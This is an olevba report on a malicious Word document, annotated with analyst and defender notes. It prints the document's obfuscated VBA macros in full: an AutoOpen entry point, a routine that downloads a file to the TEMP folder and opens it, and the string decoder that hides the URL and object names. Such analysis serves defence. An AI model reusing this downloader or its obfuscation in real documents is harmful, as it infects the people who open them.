- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS--B- 66684798.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 66684798.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: 66684798.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-exec entry point: olevba reports AutoOpen as running when the Word
- ' document is opened. The only statement is a call to S6Wrk7025w4.
- ' NOTE(review): no procedure named S6Wrk7025w4 is defined in any module shown
- ' in this report, so the link from this entry point to LZHGWIJZGNT / MQtf7O
- ' is not visible here -- confirm against the full VBA project before
- ' concluding how the download routine is reached.
- Sub autoopen()
- S6Wrk7025w4
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO dfsdfsdf.bas
- in file: 66684798.doc - OLE stream: u'Macros/VBA/dfsdfsdf'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Calls MQtf7O (module sdfsdfggg) with two arguments, both built from string
- ' literals passed through the decoder h08Nt7g80a0OJNSxSH__54e (Module1):
- '   1st argument: a decoded literal, which MQtf7O uses as the request target.
- '   2nd argument: Environ(<decoded name>) & <decoded suffix>, which MQtf7O uses
- '                 as the output file path.
- ' With the bytes as rendered on this page, the Environ argument decodes to
- ' "TEMP", so the output path is under the user's temp directory.
- ' NOTE(review): the "Base64 Strings" hit in the analysis table below is
- ' probably triggered by the short alphanumeric key literals; the strings are
- ' encoded with the byte-subtraction routine in Module1, not Base64 -- confirm.
- Sub LZHGWIJZGNT()
- MQtf7O h08Nt7g80a0OJNSxSH__54e("¬ØÆÀ„‘ˆ®—€š‡u•‰~{˜Œ~œ‚ˆz‘»¾•¹Ãƒ‘Ä¥ÒÅÀxÌÉ«", "DdRPJbYu"), Environ(h08Nt7g80a0OJNSxSH__54e("¡¶¼§", "MqoWLfWN")) & h08Nt7g80a0OJNSxSH__54e("½Þ¸º»¬Î×Ѻ‚ÀÍ", "akTTHHhq")
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO sdfsdfggg.bas
- in file: 66684798.doc - OLE stream: u'Macros/VBA/sdfsdfggg'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Download-to-disk-then-open routine (the pattern olevba flags below as
- ' CreateObject + Open + Put + Binary).
- ' Parameters: the first string is passed to the request object's .Open as the
- ' target; the second string is the path opened For Binary and written to.
- ' Returns: declared As Boolean, but the function name is never assigned, so
- ' the return value is always the default (False).
- ' Detection notes for defenders: the visible behaviour is an Office process
- ' making an outbound request, writing the raw response body to a file, and
- ' then opening a path under an Environ()-derived directory.
- Function MQtf7O(ByVal ãÏÐÃìðâûàï As String, ByVal øÐÃèâûàûâàï As String) As Boolean
- Dim øÏíãìûâãàÀ As Object, äØÙÐãîøâûàà As Long, ùÈÎÐâûàààà As Long, ðãÏÈÃÈÐâààà() As Byte
- ' Object name is hidden behind the decoder; the .Open/.Send/.responseBody
- ' members used below suggest an HTTP request object -- TODO confirm by decoding.
- Set øÏíãìûâãàÀ = CreateObject(h08Nt7g80a0OJNSxSH__54e("¦¨œž¼£€¹¢™ÄÅ¢", "YUDQpqRa"))
- ' With the bytes as rendered on this page the method literal decodes to "GET";
- ' the third argument False is passed where such objects take the async flag.
- øÏíãìûâãàÀ.Open h08Nt7g80a0OJNSxSH__54e("´”½", "mOiNlEdE"), ãÏÐÃìðâûàï, False
- øÏíãìûâãàÀ.Send h08Nt7g80a0OJNSxSH__54e("…", "PJbKhRbh")
- ' Response is taken as a raw byte array and written unmodified to disk.
- ðãÏÈÃÈÐâààà = øÏíãìûâãàÀ.responseBody
- ùÈÎÐâûàààà = FreeFile
- Open øÐÃèâûàûâàï For Binary As #ùÈÎÐâûàààà
- Put #ùÈÎÐâûàààà, , ðãÏÈÃÈÐâààà
- Close #ùÈÎÐâûàààà
- ' Second obfuscated object; its .Open is given an Environ()-based path.
- ' With the bytes as rendered here the Environ argument decodes to "TEMP".
- ' NOTE(review): presumably this opens the file written above (the suffix is
- ' encoded with a different key than in the caller) -- confirm by decoding.
- Dim îðÈÃãèðââà
- Set îðÈÃãèðââà = CreateObject(h08Nt7g80a0OJNSxSH__54e("·Ø¬ÂÏ“¯¼à³¿ÆÆâÍßµ", "dpGVcenL"))
- îðÈÃãèðââà.Open Environ(h08Nt7g80a0OJNSxSH__54e("›¯¹£", "GjlSYrAo")) & h08Nt7g80a0OJNSxSH__54e("±‡†ƒ‰{‡†…ƒŠt²Í¶", "UQQPUFMT")
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: 66684798.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' String decoder used by every obfuscated literal in this document.
- ' Parameters: lvFUAJ4O4Ww is the encoded text, HQ07 is the key.
- ' Returns: the decoded string (each encoded byte minus the matching key byte).
- ' Triage note: olevba reports "No suspicious keyword or IOC found" for this
- ' module because it uses only StrConv and arithmetic, yet it is the routine
- ' that hides the object names, request target and file paths used elsewhere.
- ' Analysts re-implementing it should mirror the key-wrap quirk noted below.
- ' NOTE(review): the encoded literals on this page went through a text
- ' rendering step and may not be byte-accurate; decode from the original file.
- Public Function h08Nt7g80a0OJNSxSH__54e(ByVal lvFUAJ4O4Ww As String, ByVal HQ07 As String)
- Dim D1WW3_661OJL03d46MkaCZS() As Byte
- Dim AF8S1() As Byte
- Dim iKuNclvIQNbaO15, jbUlyOYaUaoVg84 As Integer
- ' Filler loop: the accumulated value is never read again in this function.
- jbUlyOYaUaoVg84 = 3444
- For iKuNclvIQNbaO15 = 0 To 97
- jbUlyOYaUaoVg84 = jbUlyOYaUaoVg84 + iKuNclvIQNbaO15
- DoEvents
- Next iKuNclvIQNbaO15
- ' vbFromUnicode converts each string to a byte array in the system code page,
- ' so the byte values (and therefore the result) depend on that code page.
- D1WW3_661OJL03d46MkaCZS = StrConv(lvFUAJ4O4Ww, vbFromUnicode)
- AF8S1 = StrConv(HQ07, vbFromUnicode)
- For i = 0 To UBound(D1WW3_661OJL03d46MkaCZS)
- If i <= UBound(AF8S1) Then
- ' First pass over the key: byte i of the text minus byte i of the key.
- D1WW3_661OJL03d46MkaCZS(i) = D1WW3_661OJL03d46MkaCZS(i) - AF8S1(i)
- Else
- ' Key wrap uses Mod UBound (key length - 1), not the key length, so after
- ' the first pass the last key byte is never used again.
- D1WW3_661OJL03d46MkaCZS(i) = D1WW3_661OJL03d46MkaCZS(i) - AF8S1(i Mod UBound(AF8S1))
- End If
- Next i
- h08Nt7g80a0OJNSxSH__54e = StrConv(D1WW3_661OJL03d46MkaCZS, vbUnicode)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.